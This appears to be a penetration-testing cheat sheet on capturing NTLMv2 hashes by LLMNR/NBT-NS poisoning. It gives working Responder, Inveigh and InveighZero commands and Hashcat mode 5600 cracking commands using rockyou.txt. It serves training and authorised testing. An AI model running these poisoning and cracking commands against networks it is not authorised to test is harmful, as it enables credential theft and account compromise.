Skip to content

Captured NTLMv2 hash

From linux


sudo responder -I ens224 

We should start Responder and let it run for a while in a tmux window while we perform other enumeration tasks to maximize the number of hashes that we can obtain. Once we are ready, we can pass these hashes to Hashcat using hash mode 5600 for NTLMv2 hashes that we typically obtain with Responder. We may at times obtain NTLMv1 hashes and other types of hashes, and can consult the Hashcat example hashes page to identify them and find the proper hash mode. If we ever obtain a strange or unknown hash, this site is a great reference to help identify it.

Cracking an NTLMv2 Hash With Hashcat

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

From windows


Inveigh - powershell version

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

InveighZero - C# version

# run powershell as Admin
.\Inveigh.exe -Sniffer N
> Press ESC to enter/exit interactive console
>> HELP
>> GET NTLMV2UNIQUE
>> GET NTLMV2USERNAMES
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Tools


Tool Description
Responder Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.